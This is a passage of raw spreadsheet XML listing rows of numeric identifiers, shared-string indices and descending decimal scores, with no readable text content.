    <row r="12120" ht="15.75" customHeight="1">
      <c r="A12120" s="1">
        <v>15718.0</v>
      </c>
      <c r="B12120" s="2">
        <v>4.3974548E7</v>
      </c>
      <c r="C12120" s="2" t="s">
        <v>11642</v>
      </c>
      <c r="D12120" s="2">
        <v>1.0</v>
      </c>
      <c r="E12120" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12120" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="12121" ht="15.75" customHeight="1">
      <c r="A12121" s="1">
        <v>17035.0</v>
      </c>
      <c r="B12121" s="2">
        <v>4.8505919E7</v>
      </c>
      <c r="C12121" s="2" t="s">
        <v>11643</v>
      </c>
      <c r="D12121" s="2">
        <v>1.0</v>
      </c>
      <c r="E12121" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12121" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="12122" ht="15.75" customHeight="1">
      <c r="A12122" s="1">
        <v>18853.0</v>
      </c>
      <c r="B12122" s="2">
        <v>5.3981727E7</v>
      </c>
      <c r="C12122" s="2" t="s">
        <v>11644</v>
      </c>
      <c r="D12122" s="2">
        <v>1.0</v>
      </c>
      <c r="E12122" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12122" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="12123" ht="15.75" customHeight="1">
      <c r="A12123" s="1">
        <v>30133.0</v>
      </c>
      <c r="B12123" s="2">
        <v>3.6998292E7</v>
      </c>
      <c r="C12123" s="2" t="s">
        <v>11645</v>
      </c>
      <c r="D12123" s="2">
        <v>1.0</v>
      </c>
      <c r="E12123" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12123" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="12124" ht="15.75" customHeight="1">
      <c r="A12124" s="1">
        <v>1176.0</v>
      </c>
      <c r="B12124" s="2">
        <v>2.4637763E7</v>
      </c>
      <c r="C12124" s="2" t="s">
        <v>11646</v>
      </c>
      <c r="D12124" s="2">
        <v>1.0</v>
      </c>
      <c r="E12124" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12124" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12125" ht="15.75" customHeight="1">
      <c r="A12125" s="1">
        <v>1321.0</v>
      </c>
      <c r="B12125" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C12125" s="2" t="s">
        <v>11647</v>
      </c>
      <c r="D12125" s="2">
        <v>1.0</v>
      </c>
      <c r="E12125" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12125" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12126" ht="15.75" customHeight="1">
      <c r="A12126" s="1">
        <v>1933.0</v>
      </c>
      <c r="B12126" s="2">
        <v>3.0165673E7</v>
      </c>
      <c r="C12126" s="2" t="s">
        <v>11648</v>
      </c>
      <c r="D12126" s="2">
        <v>1.0</v>
      </c>
      <c r="E12126" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12126" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12127" ht="15.75" customHeight="1">
      <c r="A12127" s="1">
        <v>3467.0</v>
      </c>
      <c r="B12127" s="2">
        <v>3.8339304E7</v>
      </c>
      <c r="C12127" s="2" t="s">
        <v>11649</v>
      </c>
      <c r="D12127" s="2">
        <v>1.0</v>
      </c>
      <c r="E12127" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12127" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12128" ht="15.75" customHeight="1">
      <c r="A12128" s="1">
        <v>4329.0</v>
      </c>
      <c r="B12128" s="2">
        <v>4.2048158E7</v>
      </c>
      <c r="C12128" s="2" t="s">
        <v>11650</v>
      </c>
      <c r="D12128" s="2">
        <v>1.0</v>
      </c>
      <c r="E12128" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12128" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12129" ht="15.75" customHeight="1">
      <c r="A12129" s="1">
        <v>5419.0</v>
      </c>
      <c r="B12129" s="2">
        <v>4.5558289E7</v>
      </c>
      <c r="C12129" s="2" t="s">
        <v>11651</v>
      </c>
      <c r="D12129" s="2">
        <v>1.0</v>
      </c>
      <c r="E12129" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12129" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12130" ht="15.75" customHeight="1">
      <c r="A12130" s="1">
        <v>8462.0</v>
      </c>
      <c r="B12130" s="2">
        <v>5.4003799E7</v>
      </c>
      <c r="C12130" s="2" t="s">
        <v>11652</v>
      </c>
      <c r="D12130" s="2">
        <v>1.0</v>
      </c>
      <c r="E12130" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12130" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12131" ht="15.75" customHeight="1">
      <c r="A12131" s="1">
        <v>8878.0</v>
      </c>
      <c r="B12131" s="2">
        <v>5.4765684E7</v>
      </c>
      <c r="C12131" s="2" t="s">
        <v>11653</v>
      </c>
      <c r="D12131" s="2">
        <v>1.0</v>
      </c>
      <c r="E12131" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12131" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12132" ht="15.75" customHeight="1">
      <c r="A12132" s="1">
        <v>10816.0</v>
      </c>
      <c r="B12132" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C12132" s="2" t="s">
        <v>11654</v>
      </c>
      <c r="D12132" s="2">
        <v>1.0</v>
      </c>
      <c r="E12132" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12132" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12133" ht="15.75" customHeight="1">
      <c r="A12133" s="1">
        <v>11560.0</v>
      </c>
      <c r="B12133" s="2">
        <v>2.2721442E7</v>
      </c>
      <c r="C12133" s="2" t="s">
        <v>11655</v>
      </c>
      <c r="D12133" s="2">
        <v>1.0</v>
      </c>
      <c r="E12133" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12133" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12134" ht="15.75" customHeight="1">
      <c r="A12134" s="1">
        <v>11752.0</v>
      </c>
      <c r="B12134" s="2">
        <v>2.412659E7</v>
      </c>
      <c r="C12134" s="2" t="s">
        <v>11656</v>
      </c>
      <c r="D12134" s="2">
        <v>1.0</v>
      </c>
      <c r="E12134" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12134" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12135" ht="15.75" customHeight="1">
      <c r="A12135" s="1">
        <v>13251.0</v>
      </c>
      <c r="B12135" s="2">
        <v>3.4272037E7</v>
      </c>
      <c r="C12135" s="2" t="s">
        <v>11657</v>
      </c>
      <c r="D12135" s="2">
        <v>1.0</v>
      </c>
      <c r="E12135" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12135" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12136" ht="15.75" customHeight="1">
      <c r="A12136" s="1">
        <v>13459.0</v>
      </c>
      <c r="B12136" s="2">
        <v>3.5200076E7</v>
      </c>
      <c r="C12136" s="2" t="s">
        <v>11658</v>
      </c>
      <c r="D12136" s="2">
        <v>1.0</v>
      </c>
      <c r="E12136" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12136" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12137" ht="15.75" customHeight="1">
      <c r="A12137" s="1">
        <v>13746.0</v>
      </c>
      <c r="B12137" s="2">
        <v>3.6465779E7</v>
      </c>
      <c r="C12137" s="2" t="s">
        <v>11659</v>
      </c>
      <c r="D12137" s="2">
        <v>1.0</v>
      </c>
      <c r="E12137" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12137" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12138" ht="15.75" customHeight="1">
      <c r="A12138" s="1">
        <v>14549.0</v>
      </c>
      <c r="B12138" s="2">
        <v>3.994085E7</v>
      </c>
      <c r="C12138" s="2" t="s">
        <v>11660</v>
      </c>
      <c r="D12138" s="2">
        <v>1.0</v>
      </c>
      <c r="E12138" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12138" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12139" ht="15.75" customHeight="1">
      <c r="A12139" s="1">
        <v>16735.0</v>
      </c>
      <c r="B12139" s="2">
        <v>4.7519389E7</v>
      </c>
      <c r="C12139" s="2" t="s">
        <v>11661</v>
      </c>
      <c r="D12139" s="2">
        <v>1.0</v>
      </c>
      <c r="E12139" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12139" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12140" ht="15.75" customHeight="1">
      <c r="A12140" s="1">
        <v>16844.0</v>
      </c>
      <c r="B12140" s="2">
        <v>4.7908739E7</v>
      </c>
      <c r="C12140" s="2" t="s">
        <v>11662</v>
      </c>
      <c r="D12140" s="2">
        <v>1.0</v>
      </c>
      <c r="E12140" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12140" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12141" ht="15.75" customHeight="1">
      <c r="A12141" s="1">
        <v>17077.0</v>
      </c>
      <c r="B12141" s="2">
        <v>4.8611332E7</v>
      </c>
      <c r="C12141" s="2" t="s">
        <v>11663</v>
      </c>
      <c r="D12141" s="2">
        <v>1.0</v>
      </c>
      <c r="E12141" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12141" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12142" ht="15.75" customHeight="1">
      <c r="A12142" s="1">
        <v>18121.0</v>
      </c>
      <c r="B12142" s="2">
        <v>5.1774072E7</v>
      </c>
      <c r="C12142" s="2" t="s">
        <v>11664</v>
      </c>
      <c r="D12142" s="2">
        <v>1.0</v>
      </c>
      <c r="E12142" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12142" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12143" ht="15.75" customHeight="1">
      <c r="A12143" s="1">
        <v>18733.0</v>
      </c>
      <c r="B12143" s="2">
        <v>5.37135E7</v>
      </c>
      <c r="C12143" s="2" t="s">
        <v>11665</v>
      </c>
      <c r="D12143" s="2">
        <v>1.0</v>
      </c>
      <c r="E12143" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12143" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12144" ht="15.75" customHeight="1">
      <c r="A12144" s="1">
        <v>18753.0</v>
      </c>
      <c r="B12144" s="2">
        <v>5.3784846E7</v>
      </c>
      <c r="C12144" s="2" t="s">
        <v>11666</v>
      </c>
      <c r="D12144" s="2">
        <v>1.0</v>
      </c>
      <c r="E12144" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12144" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12145" ht="15.75" customHeight="1">
      <c r="A12145" s="1">
        <v>19857.0</v>
      </c>
      <c r="B12145" s="2">
        <v>5.7151182E7</v>
      </c>
      <c r="C12145" s="2" t="s">
        <v>11667</v>
      </c>
      <c r="D12145" s="2">
        <v>1.0</v>
      </c>
      <c r="E12145" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12145" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12146" ht="15.75" customHeight="1">
      <c r="A12146" s="1">
        <v>20422.0</v>
      </c>
      <c r="B12146" s="2">
        <v>1.2310026E7</v>
      </c>
      <c r="C12146" s="2" t="s">
        <v>11668</v>
      </c>
      <c r="D12146" s="2">
        <v>1.0</v>
      </c>
      <c r="E12146" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12146" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12147" ht="15.75" customHeight="1">
      <c r="A12147" s="1">
        <v>23261.0</v>
      </c>
      <c r="B12147" s="2">
        <v>5319105.0</v>
      </c>
      <c r="C12147" s="2" t="s">
        <v>11669</v>
      </c>
      <c r="D12147" s="2">
        <v>1.0</v>
      </c>
      <c r="E12147" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12147" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12148" ht="15.75" customHeight="1">
      <c r="A12148" s="1">
        <v>23343.0</v>
      </c>
      <c r="B12148" s="2">
        <v>5.47547E7</v>
      </c>
      <c r="C12148" s="2" t="s">
        <v>11670</v>
      </c>
      <c r="D12148" s="2">
        <v>1.0</v>
      </c>
      <c r="E12148" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12148" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12149" ht="15.75" customHeight="1">
      <c r="A12149" s="1">
        <v>23976.0</v>
      </c>
      <c r="B12149" s="2">
        <v>9081887.0</v>
      </c>
      <c r="C12149" s="2" t="s">
        <v>11671</v>
      </c>
      <c r="D12149" s="2">
        <v>1.0</v>
      </c>
      <c r="E12149" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12149" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12150" ht="15.75" customHeight="1">
      <c r="A12150" s="1">
        <v>27194.0</v>
      </c>
      <c r="B12150" s="2">
        <v>2.0905585E7</v>
      </c>
      <c r="C12150" s="2" t="s">
        <v>11672</v>
      </c>
      <c r="D12150" s="2">
        <v>1.0</v>
      </c>
      <c r="E12150" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12150" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12151" ht="15.75" customHeight="1">
      <c r="A12151" s="1">
        <v>27246.0</v>
      </c>
      <c r="B12151" s="2">
        <v>2.1054836E7</v>
      </c>
      <c r="C12151" s="2" t="s">
        <v>11673</v>
      </c>
      <c r="D12151" s="2">
        <v>1.0</v>
      </c>
      <c r="E12151" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12151" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12152" ht="15.75" customHeight="1">
      <c r="A12152" s="1">
        <v>27323.0</v>
      </c>
      <c r="B12152" s="2">
        <v>2.1412736E7</v>
      </c>
      <c r="C12152" s="2" t="s">
        <v>11674</v>
      </c>
      <c r="D12152" s="2">
        <v>1.0</v>
      </c>
      <c r="E12152" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12152" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12153" ht="15.75" customHeight="1">
      <c r="A12153" s="1">
        <v>27563.0</v>
      </c>
      <c r="B12153" s="2">
        <v>2.242347E7</v>
      </c>
      <c r="C12153" s="2" t="s">
        <v>11675</v>
      </c>
      <c r="D12153" s="2">
        <v>1.0</v>
      </c>
      <c r="E12153" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12153" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12154" ht="15.75" customHeight="1">
      <c r="A12154" s="1">
        <v>30270.0</v>
      </c>
      <c r="B12154" s="2">
        <v>3.7685835E7</v>
      </c>
      <c r="C12154" s="2" t="s">
        <v>11676</v>
      </c>
      <c r="D12154" s="2">
        <v>1.0</v>
      </c>
      <c r="E12154" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12154" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12155" ht="15.75" customHeight="1">
      <c r="A12155" s="1">
        <v>32264.0</v>
      </c>
      <c r="B12155" s="2">
        <v>5.517288E7</v>
      </c>
      <c r="C12155" s="2" t="s">
        <v>11677</v>
      </c>
      <c r="D12155" s="2">
        <v>1.0</v>
      </c>
      <c r="E12155" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12155" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12156" ht="15.75" customHeight="1">
      <c r="A12156" s="1">
        <v>33615.0</v>
      </c>
      <c r="B12156" s="2">
        <v>8343259.0</v>
      </c>
      <c r="C12156" s="2" t="s">
        <v>11678</v>
      </c>
      <c r="D12156" s="2">
        <v>1.0</v>
      </c>
      <c r="E12156" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12156" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="12157" ht="15.75" customHeight="1">
      <c r="A12157" s="1">
        <v>16900.0</v>
      </c>
      <c r="B12157" s="2">
        <v>4.8089963E7</v>
      </c>
      <c r="C12157" s="2" t="s">
        <v>11679</v>
      </c>
      <c r="D12157" s="2">
        <v>1.0</v>
      </c>
      <c r="E12157" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12157" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="12158" ht="15.75" customHeight="1">
      <c r="A12158" s="1">
        <v>17970.0</v>
      </c>
      <c r="B12158" s="2">
        <v>5.1358404E7</v>
      </c>
      <c r="C12158" s="2" t="s">
        <v>11680</v>
      </c>
      <c r="D12158" s="2">
        <v>1.0</v>
      </c>
      <c r="E12158" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12158" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="12159" ht="15.75" customHeight="1">
      <c r="A12159" s="1">
        <v>18758.0</v>
      </c>
      <c r="B12159" s="2">
        <v>5.378864E7</v>
      </c>
      <c r="C12159" s="2" t="s">
        <v>11681</v>
      </c>
      <c r="D12159" s="2">
        <v>1.0</v>
      </c>
      <c r="E12159" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12159" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="12160" ht="15.75" customHeight="1">
      <c r="A12160" s="1">
        <v>32374.0</v>
      </c>
      <c r="B12160" s="2">
        <v>5606495.0</v>
      </c>
      <c r="C12160" s="2" t="s">
        <v>11682</v>
      </c>
      <c r="D12160" s="2">
        <v>1.0</v>
      </c>
      <c r="E12160" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12160" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="12161" ht="15.75" customHeight="1">
      <c r="A12161" s="1">
        <v>31530.0</v>
      </c>
      <c r="B12161" s="2">
        <v>5.0929075E7</v>
      </c>
      <c r="C12161" s="2" t="s">
        <v>11683</v>
      </c>
      <c r="D12161" s="2">
        <v>1.0</v>
      </c>
      <c r="E12161" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12161" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="12162" ht="15.75" customHeight="1">
      <c r="A12162" s="1">
        <v>7045.0</v>
      </c>
      <c r="B12162" s="2">
        <v>5.0148877E7</v>
      </c>
      <c r="C12162" s="2" t="s">
        <v>11684</v>
      </c>
      <c r="D12162" s="2">
        <v>1.0</v>
      </c>
      <c r="E12162" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12162" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="12163" ht="15.75" customHeight="1">
      <c r="A12163" s="1">
        <v>14688.0</v>
      </c>
      <c r="B12163" s="2">
        <v>4.0525273E7</v>
      </c>
      <c r="C12163" s="2" t="s">
        <v>11685</v>
      </c>
      <c r="D12163" s="2">
        <v>1.0</v>
      </c>
      <c r="E12163" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12163" s="2">
        <v>0.1206597222222223</v>
      </c>
    </row>
    <row r="12164" ht="15.75" customHeight="1">
      <c r="A12164" s="1">
        <v>28426.0</v>
      </c>
      <c r="B12164" s="2">
        <v>2.642176E7</v>
      </c>
      <c r="C12164" s="2" t="s">
        <v>11686</v>
      </c>
      <c r="D12164" s="2">
        <v>1.0</v>
      </c>
      <c r="E12164" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12164" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="12165" ht="15.75" customHeight="1">
      <c r="A12165" s="1">
        <v>31245.0</v>
      </c>
      <c r="B12165" s="2">
        <v>4931367.0</v>
      </c>
      <c r="C12165" s="2" t="s">
        <v>11687</v>
      </c>
      <c r="D12165" s="2">
        <v>1.0</v>
      </c>
      <c r="E12165" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12165" s="2">
        <v>0.1202321724709785</v>
      </c>
    </row>
    <row r="12166" ht="15.75" customHeight="1">
      <c r="A12166" s="1">
        <v>2091.0</v>
      </c>
      <c r="B12166" s="2">
        <v>3.1266969E7</v>
      </c>
      <c r="C12166" s="2" t="s">
        <v>11688</v>
      </c>
      <c r="D12166" s="2">
        <v>1.0</v>
      </c>
      <c r="E12166" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12166" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="12167" ht="15.75" customHeight="1">
      <c r="A12167" s="1">
        <v>2983.0</v>
      </c>
      <c r="B12167" s="2">
        <v>3.6184373E7</v>
      </c>
      <c r="C12167" s="2" t="s">
        <v>11688</v>
      </c>
      <c r="D12167" s="2">
        <v>1.0</v>
      </c>
      <c r="E12167" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12167" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="12168" ht="15.75" customHeight="1">
      <c r="A12168" s="1">
        <v>7449.0</v>
      </c>
      <c r="B12168" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C12168" s="2" t="s">
        <v>11689</v>
      </c>
      <c r="D12168" s="2">
        <v>1.0</v>
      </c>
      <c r="E12168" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12168" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="12169" ht="15.75" customHeight="1">
      <c r="A12169" s="1">
        <v>29499.0</v>
      </c>
      <c r="B12169" s="2">
        <v>3.2708302E7</v>
      </c>
      <c r="C12169" s="2" t="s">
        <v>11690</v>
      </c>
      <c r="D12169" s="2">
        <v>1.0</v>
      </c>
      <c r="E12169" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12169" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="12170" ht="15.75" customHeight="1">
      <c r="A12170" s="1">
        <v>17054.0</v>
      </c>
      <c r="B12170" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C12170" s="2" t="s">
        <v>11691</v>
      </c>
      <c r="D12170" s="2">
        <v>1.0</v>
      </c>
      <c r="E12170" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12170" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="12171" ht="15.75" customHeight="1">
      <c r="A12171" s="1">
        <v>28741.0</v>
      </c>
      <c r="B12171" s="2">
        <v>2.8083918E7</v>
      </c>
      <c r="C12171" s="2" t="s">
        <v>11692</v>
      </c>
      <c r="D12171" s="2">
        <v>1.0</v>
      </c>
      <c r="E12171" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12171" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="12172" ht="15.75" customHeight="1">
      <c r="A12172" s="1">
        <v>29342.0</v>
      </c>
      <c r="B12172" s="2">
        <v>3.1413765E7</v>
      </c>
      <c r="C12172" s="2" t="s">
        <v>3317</v>
      </c>
      <c r="D12172" s="2">
        <v>1.0</v>
      </c>
      <c r="E12172" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12172" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="12173" ht="15.75" customHeight="1">
      <c r="A12173" s="1">
        <v>7500.0</v>
      </c>
      <c r="B12173" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C12173" s="2" t="s">
        <v>11693</v>
      </c>
      <c r="D12173" s="2">
        <v>1.0</v>
      </c>
      <c r="E12173" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12173" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="12174" ht="15.75" customHeight="1">
      <c r="A12174" s="1">
        <v>14562.0</v>
      </c>
      <c r="B12174" s="2">
        <v>4.0041668E7</v>
      </c>
      <c r="C12174" s="2" t="s">
        <v>11694</v>
      </c>
      <c r="D12174" s="2">
        <v>1.0</v>
      </c>
      <c r="E12174" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12174" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="12175" ht="15.75" customHeight="1">
      <c r="A12175" s="1">
        <v>16058.0</v>
      </c>
      <c r="B12175" s="2">
        <v>4.5269242E7</v>
      </c>
      <c r="C12175" s="2" t="s">
        <v>11695</v>
      </c>
      <c r="D12175" s="2">
        <v>1.0</v>
      </c>
      <c r="E12175" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12175" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="12176" ht="15.75" customHeight="1">
      <c r="A12176" s="1">
        <v>17228.0</v>
      </c>
      <c r="B12176" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C12176" s="2" t="s">
        <v>11696</v>
      </c>
      <c r="D12176" s="2">
        <v>1.0</v>
      </c>
      <c r="E12176" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12176" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="12177" ht="15.75" customHeight="1">
      <c r="A12177" s="1">
        <v>22576.0</v>
      </c>
      <c r="B12177" s="2">
        <v>3.8753117E7</v>
      </c>
      <c r="C12177" s="2" t="s">
        <v>11697</v>
      </c>
      <c r="D12177" s="2">
        <v>1.0</v>
      </c>
      <c r="E12177" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12177" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="12178" ht="15.75" customHeight="1">
      <c r="A12178" s="1">
        <v>3482.0</v>
      </c>
      <c r="B12178" s="2">
        <v>3.8404361E7</v>
      </c>
      <c r="C12178" s="2" t="s">
        <v>11698</v>
      </c>
      <c r="D12178" s="2">
        <v>1.0</v>
      </c>
      <c r="E12178" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12178" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="12179" ht="15.75" customHeight="1">
      <c r="A12179" s="1">
        <v>15607.0</v>
      </c>
      <c r="B12179" s="2">
        <v>4.3514218E7</v>
      </c>
      <c r="C12179" s="2" t="s">
        <v>11699</v>
      </c>
      <c r="D12179" s="2">
        <v>1.0</v>
      </c>
      <c r="E12179" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12179" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="12180" ht="15.75" customHeight="1">
      <c r="A12180" s="1">
        <v>18684.0</v>
      </c>
      <c r="B12180" s="2">
        <v>5.3592645E7</v>
      </c>
      <c r="C12180" s="2" t="s">
        <v>11700</v>
      </c>
      <c r="D12180" s="2">
        <v>1.0</v>
      </c>
      <c r="E12180" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12180" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="12181" ht="15.75" customHeight="1">
      <c r="A12181" s="1">
        <v>6513.0</v>
      </c>
      <c r="B12181" s="2">
        <v>4.8777135E7</v>
      </c>
      <c r="C12181" s="2" t="s">
        <v>11701</v>
      </c>
      <c r="D12181" s="2">
        <v>1.0</v>
      </c>
      <c r="E12181" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12181" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="12182" ht="15.75" customHeight="1">
      <c r="A12182" s="1">
        <v>12478.0</v>
      </c>
      <c r="B12182" s="2">
        <v>2.9478306E7</v>
      </c>
      <c r="C12182" s="2" t="s">
        <v>11702</v>
      </c>
      <c r="D12182" s="2">
        <v>1.0</v>
      </c>
      <c r="E12182" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12182" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="12183" ht="15.75" customHeight="1">
      <c r="A12183" s="1">
        <v>14177.0</v>
      </c>
      <c r="B12183" s="2">
        <v>3.8072481E7</v>
      </c>
      <c r="C12183" s="2" t="s">
        <v>11703</v>
      </c>
      <c r="D12183" s="2">
        <v>1.0</v>
      </c>
      <c r="E12183" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12183" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="12184" ht="15.75" customHeight="1">
      <c r="A12184" s="1">
        <v>18272.0</v>
      </c>
      <c r="B12184" s="2">
        <v>5.2222319E7</v>
      </c>
      <c r="C12184" s="2" t="s">
        <v>11704</v>
      </c>
      <c r="D12184" s="2">
        <v>1.0</v>
      </c>
      <c r="E12184" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12184" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="12185" ht="15.75" customHeight="1">
      <c r="A12185" s="1">
        <v>32196.0</v>
      </c>
      <c r="B12185" s="2">
        <v>5.4754699E7</v>
      </c>
      <c r="C12185" s="2" t="s">
        <v>11670</v>
      </c>
      <c r="D12185" s="2">
        <v>1.0</v>
      </c>
      <c r="E12185" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12185" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="12186" ht="15.75" customHeight="1">
      <c r="A12186" s="1">
        <v>156.0</v>
      </c>
      <c r="B12186" s="2">
        <v>1.3707667E7</v>
      </c>
      <c r="C12186" s="2" t="s">
        <v>11705</v>
      </c>
      <c r="D12186" s="2">
        <v>1.0</v>
      </c>
      <c r="E12186" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12186" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
